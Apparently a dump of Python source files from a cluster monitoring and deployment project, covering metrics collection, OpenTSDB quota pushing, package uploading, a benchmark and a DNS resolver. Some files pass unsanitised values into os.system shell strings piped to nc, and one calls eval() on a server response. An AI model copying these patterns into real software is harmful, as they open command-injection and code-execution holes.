reactor.callInThread(self.produce_aggregate_task_in_thread, input_queue)\n\n def produce_aggregate_task_in_thread(self, input_queue):\n try:\n input_queue.put(QueueTask(AGGREGATE_TASK_TYPE, None))\n except Exception as e:\n logger.warning(\"Failed to produce aggregate task %r\", e)\n finally:\n self.schedule_next_aggregation(input_queue)\n\n def schedule_next_aggregation(self, input_queue):\n wait_time = self.collector_config.period\n reactor.callFromThread(reactor.callLater, wait_time,\n self.produce_aggregate_task, input_queue)\n\nclass StatusUpdater:\n \"\"\"\n Update status of all active clusters and jobs, which are inferred from\n tasks' status.\n \"\"\"\n def __init__(self, collector_config):\n self.collector_config = collector_config\n\n def produce_status_update_task(self, input_queue):\n reactor.callInThread(self.produce_status_update_task_in_thread, input_queue)\n\n def produce_status_update_task_in_thread(self, input_queue):\n try:\n input_queue.put(QueueTask(STATUS_TASK_TYPE, None))\n except Exception as e:\n logger.warning(\"Failed to produce status updater task %r\", e)\n finally:\n self.schedule_next_status_update(input_queue)\n\n def schedule_next_status_update(self, input_queue):\n wait_time = self.collector_config.period\n reactor.callFromThread(reactor.callLater, wait_time,\n self.produce_status_update_task, input_queue)\n\nclass Command(BaseCommand):\n args = ''\n help = \"Run the background collector to fetch metrics from /jmx on each server.\"\n\n option_list = BaseCommand.option_list + (\n make_option(\n \"--use_threadpool\",\n action=\"store_true\",\n default=False,\n help=\"Use thread pool to store metrics to database if the flag is on.\"),\n make_option(\n \"--collector_cfg\",\n default=\"collector.cfg\",\n help=\"Specify collector configuration file\"\n ),\n make_option(\n \"--clear_old_tasks\",\n action=\"store_true\",\n default=False,\n help=\"Set true for clear old tasks\"\n ),\n )\n\n def handle(self, *args, **options):\n gc.set_debug(gc.DEBUG_STATS)\n\n self.args = args\n self.options = options\n\n self.stdout.write(\"args: %r\\n\" % (args, ))\n self.stdout.write(\"options: %r\\n\" % options)\n\n self.collector_config = CollectorConfig(self.args, self.options)\n if self.options['clear_old_tasks']:\n self.clear_old_tasks()\n\n self.update_active_tasks()\n\n self.input_queue = multiprocessing.Queue()\n self.output_queue = multiprocessing.Queue()\n\n for idx in range(PROCESS_NUM):\n multiprocessing.Process(target=process_queue_task,\n args=(self.input_queue, self.output_queue)).start()\n\n self.fetch_metrics()\n\n def clear_old_tasks():\n # Mark all current tasks as deactive.\n Service.objects.all().update(active=False)\n Cluster.objects.all().update(active=False)\n Job.objects.all().update(active=False)\n Task.objects.all().update(active=False)\n\n def update_active_tasks(self):\n # Add all active tasks\n self.metric_sources = []\n for service_name, service in self.collector_config.services.iteritems():\n # Save to database.\n # The active field has the default value True.\n service_record, created = Service.objects.get_or_create(\n name=service_name,\n defaults={\"metric_url\":service.metric_url})\n if not created:\n # Mark it as active if it exists.\n service_record.active = True\n service_record.save()\n\n for cluster_name, cluster in service.clusters.iteritems():\n cluster_record, created = Cluster.objects.get_or_create(\n service=service_record, name=cluster_name)\n if not created:\n cluster_record.active = True\n cluster_record.save()\n\n for job_name in service.jobs:\n job_record, created = Job.objects.get_or_create(\n cluster=cluster_record, name=job_name)\n if not created:\n job_record.active = True\n job_record.save()\n\n job = cluster.jobs[job_name]\n # We assume http port is always base_port + 1\n port = job.base_port + 1\n # support multiple instances\n hosts = job.hosts\n for host_id, host in hosts.iteritems():\n host_name = job.hostnames[host_id]\n for instance_id in range(host.instance_num):\n task_id = deploy_utils.get_task_id(hosts, host_id, instance_id)\n instance_port = deploy_utils.get_base_port(port,instance_id)\n task_record, created = Task.objects.get_or_create(\n job=job_record, task_id=task_id,\n defaults={\"host\":host_name, \"port\":instance_port})\n if not created or task_record.host != host_name or (\n task_record.port != instance_port):\n task_record.active = True\n task_record.host = host_name\n task_record.port = instance_port\n task_record.save()\n self.metric_sources.append(\n MetricSource(self.collector_config, task_record))\n\n def consume_processed_result(self):\n while True: # get all the task in output queue\n try:\n queue_task = self.output_queue.get(timeout=0.5)\n if queue_task.task_type == METRIC_TASK_TYPE:\n metric_source_id = queue_task.task_data\n self.metric_sources[metric_source_id].schedule_next_fetch(self.input_queue)\n except Queue.Empty:\n logger.warning('Output Queue is empty.')\n continue\n\n def schedule_next_rolling(self):\n reactor.callInThread(self.consume_processed_result)\n\n def fetch_metrics(self):\n for index, metric_source in enumerate(self.metric_sources):\n # Randomize the start time of each metric source.\n # Because StatusUpdater will always update cluster status every 'self.collector_config.period',\n # here, we use 'self.collector_config.period - 2' to give each task at least 2 seconds to\n # download page and update its status into database before StatusUpdater starting to update cluster\n # status based on each task's status\n wait_time = random.uniform(0, self.collector_config.period - 2)\n # store the metric_source id for one task and just return the metric_source id to\n # the output queue when the subprocesses complete the task.\n metric_source.task.metric_source_id = index\n # store a redundant attribute 'need_analyze' for task\n metric_source.task.need_analyze = metric_source.need_analyze\n logger.info(\"%r waiting %f seconds for %s...\" ,\n metric_source.task, wait_time, metric_source.url)\n reactor.callLater(wait_time, metric_source.fetch_metrics, self.input_queue)\n \n # schedule next fetch for metrics updating\n reactor.callLater(self.collector_config.period - 2, self.schedule_next_rolling)\n\n # call status updater task after fetching metrics\n status_updater = StatusUpdater(self.collector_config)\n reactor.callLater(self.collector_config.period + 1,\n status_updater.produce_status_update_task, self.input_queue)\n\n region_operation_aggregator = RegionOperationMetricAggregator(\n self.collector_config)\n # we start to aggregate region operation metric after one period\n reactor.callLater(self.collector_config.period + 1,\n region_operation_aggregator.produce_aggregate_task, self.input_queue)\n\n reactor.run()\n\n"
},
{
"alpha_fraction": 0.6498237252235413,
"alphanum_fraction": 0.6537407040596008,
"avg_line_length": 34.95774459838867,
"blob_id": "76da7444027f0ea8a15e41baf5a71f0ff23d30a4",
"content_id": "e70f4cace141c75c2059b150bd277a19f9fa1be4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2553,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 71,
"path": "/owl/utils/quota_injector.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\nimport sys\nimport time\n\nfrom urlparse import urlparse\n\nroot_path = os.path.abspath(\n os.path.dirname(os.path.realpath(__file__))+ '/../..')\nopentsdb_path = os.path.join(root_path, 'opentsdb')\nsys.path.append(opentsdb_path)\ntsdb_register = __import__('tsdb_register')\nfrom tsdb_register import conf_path\nfrom tsdb_register import TsdbRegister\n\nowl_config_path = os.path.join(conf_path, 'owl')\nsys.path.append(owl_config_path)\nowl_config = __import__('owl_config')\ntsdb_host, tsdb_port = urlparse(owl_config.TSDB_ADDR).netloc.split(':')\n\nlogger_quota = logging.getLogger('quota')\n\n# the quota items need to calculate the total value\nQUOTA_TOTAL_DICT = {\n 'used_quota': (int, 0),\n 'used_space_quota': (int, 0),\n}\n\nclass QuotaInjector():\n '''\n Push quota information into opentsdb\n '''\n def __init__(self):\n self.tsdb_register = TsdbRegister()\n\n def check_quota_new_keys(self, quota_list):\n if len(quota_list) > 0:\n for quota_key in quota_list[0].keys():\n if quota_key not in self.tsdb_register.register_keys and quota_key != 'name':\n self.tsdb_register.new_keys.append(quota_key)\n self.tsdb_register.register_keys.add(quota_key)\n self.tsdb_register.register_new_keys_to_tsdb()\n\n def push_quota_to_tsdb(self, quota_list, cluster_name):\n self.check_quota_new_keys(quota_list)\n timestamp = int(time.time())\n\n # reset the quota_total_dict\n quota_total_dict = dict.fromkeys(QUOTA_TOTAL_DICT, 0)\n\n # push every user's quota to tsdb for cluster_name\n for quota_dict in quota_list:\n for quota_key, quota_value in quota_dict.iteritems():\n if quota_key != 'name':\n if not quota_value.isdigit():\n quota_value = '0'\n quota_record = \"%s %d %d user_id=%s cluster=%s\" % (\n quota_key, timestamp, int(quota_value), quota_dict['name'], cluster_name)\n put_operation = 'echo put %s | nc -w 10 %s %s' % (quota_record, tsdb_host, tsdb_port)\n logger_quota.info(put_operation)\n os.system(put_operation)\n if quota_key in quota_total_dict.keys():\n quota_total_dict[quota_key] += int(quota_value)\n\n # push the total values to tsdb\n for quota_key, quota_value in quota_total_dict.iteritems():\n quota_record = \"%s %d %d user_id=%s cluster=%s\" % (\n quota_key, timestamp, quota_value, quota_key+'_total', cluster_name)\n put_operation = 'echo put %s | nc -w 10 %s %s' % (quota_record, tsdb_host, tsdb_port)\n logger_quota.info(put_operation)\n os.system(put_operation)\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.7063491940498352,
"avg_line_length": 30.5,
"blob_id": "67310d49089cc63eef2fb3851914b105553add3d",
"content_id": "e0e1ecc39c9cfe65d7f9020993f4396d01ea872e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 4,
"path": "/config/opentsdb/metrics_collector_config.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "metrics_url = 'http://127.0.0.1:8000/monitor/metrics'\nopentsdb_bin_path = 'tsdb'\nopentsdb_extra_args = ''\ncollect_period = 10\n"
},
{
"alpha_fraction": 0.6809477210044861,
"alphanum_fraction": 0.6831573843955994,
"avg_line_length": 31.583999633789062,
"blob_id": "f1a13180a8023266164ea4dadd9426c127f3d6c8",
"content_id": "e21bc16d4cb0dc0c3fc33450de7487dbe6e6db1f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8146,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 250,
"path": "/client/package.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport glob\nimport hashlib\nimport os\nimport pprint\nimport subprocess\nimport yaml\n\nimport deploy_config\n\nfrom log import Log\nfrom tank_client import TankClient\n\n\ndef check_directory(path):\n if not os.path.exists(path):\n Log.print_critical(\n 'Directory doesn''t exist: ' + path)\n if not os.path.isdir(path):\n Log.print_critical(\n 'NOT a directory: ' + path)\n if not os.access(path, os.X_OK):\n Log.print_critical(\n 'Can''t cd to: ' + path)\n\ndef check_file(path):\n if not os.path.exists(path):\n Log.print_critical(\n 'File doesn''t exist: ' + path)\n if not os.path.isfile(path):\n Log.print_critical(\n 'NOT a file: ' + path)\n if not os.access(path, os.R_OK):\n Log.print_critical(\n 'Can''t read file: ' + path)\n\ndef get_package_config_dir():\n return deploy_config.get_deploy_config().get_config_dir() + '/package'\n\ndef get_package_config_file(package):\n return '%s/%s.yaml' % (get_package_config_dir(), package)\n\ndef get_pacakge_config(package):\n return yaml.load(open(get_package_config_file(package)))\n\ndef get_tank_client():\n '''\n A factory method to construct a tank(package server) client object.\n '''\n tank_config = deploy_config.get_deploy_config().get_tank_config()\n\n return TankClient(tank_config.get('server_host'),\n tank_config.get('server_port'))\n\ndef get_revision_number(cmd, output_prefix, work_space_dir):\n env = os.environ\n # Enforce English locale.\n env[\"LC_ALL\"] = \"C\"\n current_work_dir = os.getcwd()\n os.chdir(work_space_dir)\n content = subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=env)\n os.chdir(current_work_dir)\n for line in content.splitlines():\n if line.startswith(output_prefix):\n return line[len(output_prefix):]\n\ndef generate_package_revision(root):\n '''\n Get the revision of the package. Currently, svn revision and git commit are\n supported. If the package directory is neither a svn working directory nor\n a git working directory, a fake revision will be returned.\n\n @param root the local package root directory\n @return string the revision of the package\n '''\n if os.path.islink(root):\n real_path = os.readlink(root)\n if not real_path.startswith('/'):\n abs_path = \"%s/%s\" % (os.path.dirname(root), real_path)\n else:\n abs_path = real_path\n else:\n abs_path = root\n\n try:\n try:\n cmd = [\"svn\", \"info\"]\n revision_prefix = \"Revision: \"\n return \"r%s\" % get_revision_number(cmd, revision_prefix, abs_path)\n except:\n cmd = [\"git\", \"show\"]\n commit_prefix = \"commit \"\n return get_revision_number(cmd, commit_prefix, abs_path)\n except:\n # We cannot get the version No., just return a fake one\n return \"r%s\" % FAKE_SVN_VERSION\n\ndef generate_checksum(path):\n '''\n Generate the SHA-1 digest of specified file.\n\n @param path the path of the file\n @return string the SHA-1 digest\n '''\n fd = open(path, \"r\")\n sha1 = hashlib.sha1()\n while True:\n buffer = fd.read(4096)\n if not buffer: break\n sha1.update(buffer)\n fd.close()\n return sha1.hexdigest()\n\ndef upload_package(artifact, package_tarball, package_source):\n '''\n Upload the specified package to the package server(Tank). Note that\n if the file with the same checksum is already uploaded, this uploading\n will be skipped.\n\n @param artifact the artifact of the package\n @return dict the package information return by the package server\n '''\n Log.print_info(\"Uploading pacakge: %s\" % package_tarball)\n\n revision = generate_package_revision(package_source)\n Log.print_success(\"Revision is: %s\" % revision)\n\n Log.print_info(\"Generating checksum of package: %s\" % package_tarball)\n checksum = generate_checksum(package_tarball)\n Log.print_success(\"Checksum is: %s\" % checksum)\n\n tank_client = get_tank_client()\n package_info = tank_client.check_package(artifact, checksum)\n\n if not package_info:\n if 200 == tank_client.upload(package_tarball, artifact, revision):\n Log.print_success(\"Upload package %s success\" % package_tarball)\n package_info = tank_client.check_package(artifact, checksum)\n return eval(package_info)\n else:\n Log.print_warning(\"Package %s has already uploaded, skip uploading\" %\n package_tarball)\n return eval(package_info)\n return None\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Manage Minos packages.')\n\n parser.add_argument('--version', action='version',\n version='%(prog)s 1.0.0-beta')\n parser.add_argument('-v', '--verbosity', default=0, type=int,\n help='The verbosity level of log, higher value, more details.')\n\n subparsers = parser.add_subparsers(\n title='commands',\n help='Type \\'%(prog)s command -h\\' to get more help for individual '\n 'command.')\n\n sub_parser = subparsers.add_parser(\n 'list',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help='List packages, locally or remotely.')\n sub_parser.add_argument('--remote', action='store_true',\n help='List remote packages.')\n sub_parser.set_defaults(handler=process_command_list)\n\n sub_parser = subparsers.add_parser(\n 'build',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help='Build local package.')\n sub_parser.add_argument('package',\n help='The package name.')\n sub_parser.set_defaults(handler=process_command_build)\n\n sub_parser = subparsers.add_parser(\n 'install',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help='Install binary packages from local to remote package server.')\n sub_parser.add_argument('--make_current', action='store_false',\n help='Make the installed pacakge as current version.')\n sub_parser.add_argument('package',\n help='The package name.')\n sub_parser.set_defaults(handler=process_command_install)\n\n args = parser.parse_args()\n Log.verbosity = args.verbosity\n return args\n\ndef process_command_list(args):\n if not args.remote:\n # list local packages.\n Log.print_info('All local packages:')\n print '[package]: [artifact] [version]'\n for path in glob.glob(get_package_config_file('*')):\n basename = os.path.basename(path)\n package = basename[:-len('.yaml')]\n package_config = get_pacakge_config(package)\n print '%s: %s %s' % (\n package, package_config['artifact'], package_config['version'])\n else:\n # list local packages.\n Log.print_critical('Not implemented yet!')\n\ndef process_command_build(args):\n package_file = get_package_config_file(args.package)\n package_config = get_pacakge_config(args.package)\n package_dir = os.path.dirname(package_file)\n\n package_source = os.path.abspath(\n os.path.join(package_dir, package_config['source']))\n check_directory(package_source)\n\n subprocess.check_call(\n 'cd %s; %s' % (package_source, package_config['build']), shell=True)\n\ndef process_command_install(args):\n package_file = get_package_config_file(args.package)\n package_config = get_pacakge_config(args.package)\n package_dir = os.path.dirname(package_file)\n\n package_source = os.path.abspath(\n os.path.join(package_dir, package_config['source']))\n package_tarball = os.path.abspath(\n os.path.join(package_source, package_config['package']['tarball']))\n # the abspath would remove the trailing slash, so we have to check the\n # original config.\n if package_config['package']['tarball'][-1] == '/':\n package_tarball += '/%s-%s.tar.gz' % (\n package_config['artifact'], package_config['version'])\n check_file(package_tarball)\n\n Log.print_info(\"Installing %s to package server\" % package_config['artifact'])\n package_info = upload_package(\n package_config['artifact'], package_tarball, package_source)\n if package_info:\n Log.print_success(\"Install %s to package server success\" %\n package_config['artifact'])\n pprint.pprint(package_info)\n else:\n Log.print_critical(\"Install %s to package server fail\" %\n package_config['artifact'])\n\ndef main():\n args = parse_command_line()\n return args.handler(args)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6558345556259155,
"alphanum_fraction": 0.6654357314109802,
"avg_line_length": 30.126436233520508,
"blob_id": "172dccf62aa9d4f177c70c3993eb4a6c1675dee0",
"content_id": "4f540fa6a09de94eae3d7f756bcaab44e7b35629",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2708,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 87,
"path": "/opentsdb/metrics_collector.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport logging.config\nimport os\nimport sys\nimport time\nimport tsdb_register\nimport urllib\n\nfrom tsdb_register import collect_period\nfrom tsdb_register import metrics_url\nfrom tsdb_register import opentsdb_bin_path\nfrom tsdb_register import opentsdb_extra_args\nfrom tsdb_register import TsdbRegister\n\nlocal_data_path = 'metrics_dump.data'\n\nlogging.config.fileConfig('metrics_logging.conf')\nlogger_metrics = logging.getLogger('metrics')\n\ndef verify_config():\n if not metrics_url:\n logger_metrics.warning(\"Please set metrics url\")\n return False\n\n if not opentsdb_bin_path:\n logger_metrics.warning(\"Please set opentsdb_bin_path\")\n return False\n\n if not collect_period:\n logger_metrics.warning(\"Please set collect_period\")\n return False\n\n return True\n\nclass MetricsCollector():\n def __init__(self):\n self.tsdb_register = TsdbRegister()\n\n def run(self):\n while True:\n start = time.time()\n self.collect_metrics()\n self.tsdb_register.register_new_keys_to_tsdb()\n self.batch_output_to_tsdb()\n end = time.time()\n to_sleep_time = collect_period - (end - start)\n if to_sleep_time > 0:\n time.sleep(to_sleep_time)\n\n def collect_metrics(self):\n try:\n out_file = open(local_data_path, 'w')\n json_string = urllib.urlopen(metrics_url).read()\n metrics = json.loads(json_string)\n timestamp = metrics['timestamp']\n for endpoint, group_metrics in metrics['data'].iteritems():\n for group, key_metrics in group_metrics.iteritems():\n for key, metric in key_metrics.iteritems():\n if key.find('#') != -1:\n key = key.replace(\"#\", \"_\")\n value = metric['value']\n self.append_to_file(out_file, timestamp, key, value, endpoint, group)\n if key not in self.tsdb_register.register_keys:\n self.tsdb_register.new_keys.append(key)\n self.tsdb_register.register_keys.add(key)\n out_file.close()\n except Exception, e:\n logger_metrics.error(\"collect_metrics exception: %s\", e)\n\n @staticmethod\n def append_to_file(out_file, timestamp, key, value, endpoint, group):\n # format example: metric_key 1288900000 42 host=127.0.0.1-10000 group=Master\n out_file.write(\"%s %s %s host=%s group=%s\\n\" % (key, timestamp, value, endpoint, group))\n\n\n def batch_output_to_tsdb(self):\n start_time = time.time()\n os.system('%s import %s %s' % (opentsdb_bin_path, opentsdb_extra_args, local_data_path))\n logger_metrics.info(\"Batch import metrics cost %f secs\" % (time.time() - start_time))\n\nif __name__ == '__main__':\n if not verify_config():\n sys.exit(-1)\n\n collector = MetricsCollector()\n collector.run()\n"
},
{
"alpha_fraction": 0.5288100242614746,
"alphanum_fraction": 0.536116898059845,
"avg_line_length": 29.12578582763672,
"blob_id": "268a57fe8ea987fe2bfec3d7fce78f4de653dee5",
"content_id": "ce76895a481ee822228ffc5cb9f7f3997b5c9672",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4790,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 159,
"path": "/supervisor/supervisor/medusa/test/test_lb.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# Get a lower bound for Medusa performance with a simple async\n# client/server benchmark built on the async lib. The idea is to test\n# all the underlying machinery [select, asyncore, asynchat, etc...] in\n# a context where there is virtually no processing of the data.\n\nimport socket\nimport select\nimport sys\n\n# ==================================================\n# server\n# ==================================================\n\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import asynchat_25 as asynchat\n\nclass test_channel (asynchat.async_chat):\n\n ac_in_buffer_size = 16384\n ac_out_buffer_size = 16384\n\n total_in = 0\n\n def __init__ (self, conn, addr):\n asynchat.async_chat.__init__ (self, conn)\n self.set_terminator ('\\r\\n\\r\\n')\n self.buffer = ''\n\n def collect_incoming_data (self, data):\n self.buffer = self.buffer + data\n test_channel.total_in = test_channel.total_in + len(data)\n\n def found_terminator (self):\n # we've gotten the data, now send it back\n data = self.buffer\n self.buffer = ''\n self.push (data+'\\r\\n\\r\\n')\n\n def handle_close (self):\n sys.stdout.write ('.'); sys.stdout.flush()\n self.close()\n\n def log (self, *args):\n pass\n\nclass test_server (asyncore.dispatcher):\n def __init__ (self, addr):\n\n if type(addr) == type(''):\n f = socket.AF_UNIX\n else:\n f = socket.AF_INET\n\n self.create_socket (f, socket.SOCK_STREAM)\n self.bind (addr)\n self.listen (5)\n print 'server started on',addr\n\n def handle_accept (self):\n conn, addr = self.accept()\n test_channel (conn, addr)\n\n# ==================================================\n# client\n# ==================================================\n\n# pretty much the same behavior, except that we kick\n# off the exchange and decide when to quit\n\nclass test_client (test_channel):\n\n def __init__ (self, addr, packet, number):\n if type(addr) == type(''):\n f = socket.AF_UNIX\n else:\n f = socket.AF_INET\n\n asynchat.async_chat.__init__ (self)\n self.create_socket (f, socket.SOCK_STREAM)\n self.set_terminator ('\\r\\n\\r\\n')\n self.buffer = ''\n self.connect (addr)\n self.push (packet + '\\r\\n\\r\\n')\n self.number = number\n self.count = 0\n\n def handle_connect (self):\n pass\n\n def found_terminator (self):\n self.count = self.count + 1\n if self.count == self.number:\n sys.stdout.write('.'); sys.stdout.flush()\n self.close()\n else:\n test_channel.found_terminator (self)\n\nimport time\n\nclass timer:\n def __init__ (self):\n self.start = time.time()\n\n def end (self):\n return time.time() - self.start\n\nif __name__ == '__main__':\n import string\n\n if '--poll' in sys.argv:\n sys.argv.remove ('--poll')\n use_poll=1\n else:\n use_poll=0\n\n if len(sys.argv) == 1:\n print 'usage: %s\\n' \\\n ' (as a server) [--poll] -s <ip> <port>\\n' \\\n ' (as a client) [--poll] -c <ip> <port> <packet-size> <num-packets> <num-connections>\\n' % sys.argv[0]\n sys.exit(0)\n if sys.argv[1] == '-s':\n s = test_server ((sys.argv[2], string.atoi (sys.argv[3])))\n asyncore.loop(use_poll=use_poll)\n elif sys.argv[1] == '-c':\n # create the packet\n packet = string.atoi(sys.argv[4]) * 'B'\n host = sys.argv[2]\n port = string.atoi (sys.argv[3])\n num_packets = string.atoi (sys.argv[5])\n num_conns = string.atoi (sys.argv[6])\n\n t = timer()\n for i in range (num_conns):\n test_client ((host,port), packet, num_packets)\n asyncore.loop(use_poll=use_poll)\n total_time = t.end()\n\n # ok, now do some numbers\n bytes = test_client.total_in\n num_trans = num_packets * num_conns\n total_bytes = num_trans * len(packet)\n throughput = float (total_bytes) / total_time\n trans_per_sec = num_trans / total_time\n\n sys.stderr.write ('total time: %.2f\\n' % total_time)\n sys.stderr.write ( 'number of transactions: %d\\n' % num_trans)\n sys.stderr.write ( 'total bytes sent: %d\\n' % total_bytes)\n sys.stderr.write ( 'total throughput (bytes/sec): %.2f\\n' % throughput)\n sys.stderr.write ( ' [note, throughput is this amount in each direction]\\n')\n sys.stderr.write ( 'transactions/second: %.2f\\n' % trans_per_sec)\n\n sys.stdout.write (\n string.join (\n map (str, (num_conns, num_packets, len(packet), throughput, trans_per_sec)),\n ','\n ) + '\\n'\n )\n"
},
{
"alpha_fraction": 0.3815924823284149,
"alphanum_fraction": 0.42365577816963196,
"avg_line_length": 34.33636474609375,
"blob_id": "1f1dffc2e1c00041fcada5b15dd94e1c0501c357",
"content_id": "9c350157a33961e1f20903107391b636ca10557c",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15548,
"license_type": "permissive",
"max_line_length": 437,
"num_lines": 440,
"path": "/supervisor/supervisor/medusa/resolver.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n#\n# Author: Sam Rushing <[email protected]>\n#\n\nRCS_ID = '$Id: resolver.py,v 1.4 2002/03/20 17:37:48 amk Exp $'\n\n\n# Fast, low-overhead asynchronous name resolver. uses 'pre-cooked'\n# DNS requests, unpacks only as much as it needs of the reply.\n\n# see rfc1035 for details\n\nimport string\nimport asyncore_25 as asyncore\nimport socket\nimport sys\nimport time\nfrom counter import counter\n\nVERSION = string.split(RCS_ID)[2]\n\n# header\n# 1 1 1 1 1 1\n# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | ID |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | QDCOUNT |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | ANCOUNT |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | NSCOUNT |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | ARCOUNT |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n\n\n# question\n# 1 1 1 1 1 1\n# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | |\n# / QNAME /\n# / /\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | QTYPE |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | QCLASS |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n\n# build a DNS address request, _quickly_\ndef fast_address_request (host, id=0):\n return (\n '%c%c' % (chr((id>>8)&0xff),chr(id&0xff))\n + '\\001\\000\\000\\001\\000\\000\\000\\000\\000\\000%s\\000\\000\\001\\000\\001' % (\n string.join (\n map (\n lambda part: '%c%s' % (chr(len(part)),part),\n string.split (host, '.')\n ), ''\n )\n )\n )\n\ndef fast_ptr_request (host, id=0):\n return (\n '%c%c' % (chr((id>>8)&0xff),chr(id&0xff))\n + '\\001\\000\\000\\001\\000\\000\\000\\000\\000\\000%s\\000\\000\\014\\000\\001' % (\n string.join (\n map (\n lambda part: '%c%s' % (chr(len(part)),part),\n string.split (host, '.')\n ), ''\n )\n )\n )\n\ndef unpack_name (r,pos):\n n = []\n while 1:\n ll = ord(r[pos])\n if (ll&0xc0):\n # compression\n pos = (ll&0x3f << 8) + (ord(r[pos+1]))\n elif ll == 0:\n break\n else:\n pos = pos + 1\n n.append (r[pos:pos+ll])\n pos = pos + ll\n return string.join (n,'.')\n\ndef skip_name (r,pos):\n s = pos\n while 1:\n ll = ord(r[pos])\n if (ll&0xc0):\n # compression\n return pos + 2\n elif ll == 0:\n pos = pos + 1\n break\n else:\n pos = pos + ll + 1\n return pos\n\ndef unpack_ttl (r,pos):\n return reduce (\n lambda x,y: (x<<8)|y,\n map (ord, r[pos:pos+4])\n )\n\n# resource record\n# 1 1 1 1 1 1\n# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | |\n# / /\n# / NAME /\n# | |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | TYPE |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | CLASS |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | TTL |\n# | |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# | RDLENGTH |\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|\n# / RDATA /\n# / /\n# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n\ndef unpack_address_reply (r):\n ancount = (ord(r[6])<<8) + (ord(r[7]))\n # skip question, first name starts at 12,\n # this is followed by QTYPE and QCLASS\n pos = skip_name (r, 12) + 4\n if ancount:\n # we are looking very specifically for\n # an answer with TYPE=A, CLASS=IN (\\000\\001\\000\\001)\n for an in range(ancount):\n pos = skip_name (r, pos)\n if r[pos:pos+4] == '\\000\\001\\000\\001':\n return (\n unpack_ttl (r,pos+4),\n '%d.%d.%d.%d' % tuple(map(ord,r[pos+10:pos+14]))\n )\n # skip over TYPE, CLASS, TTL, RDLENGTH, RDATA\n pos = pos + 8\n rdlength = (ord(r[pos])<<8) + (ord(r[pos+1]))\n pos = pos + 2 + rdlength\n return 0, None\n else:\n return 0, None\n\ndef unpack_ptr_reply (r):\n ancount = (ord(r[6])<<8) + (ord(r[7]))\n # skip question, first name starts at 12,\n # this is followed by QTYPE and QCLASS\n pos = skip_name (r, 12) + 4\n if ancount:\n # we are looking very specifically for\n # an answer with TYPE=PTR, CLASS=IN (\\000\\014\\000\\001)\n for an in range(ancount):\n pos = skip_name (r, pos)\n if r[pos:pos+4] == '\\000\\014\\000\\001':\n return (\n unpack_ttl (r,pos+4),\n unpack_name (r, pos+10)\n )\n # skip over TYPE, CLASS, TTL, RDLENGTH, RDATA\n pos = pos + 8\n rdlength = (ord(r[pos])<<8) + (ord(r[pos+1]))\n pos = pos + 2 + rdlength\n return 0, None\n else:\n return 0, None\n\n\n# This is a UDP (datagram) resolver.\n\n#\n# It may be useful to implement a TCP resolver. This would presumably\n# give us more reliable behavior when things get too busy. A TCP\n# client would have to manage the connection carefully, since the\n# server is allowed to close it at will (the RFC recommends closing\n# after 2 minutes of idle time).\n#\n# 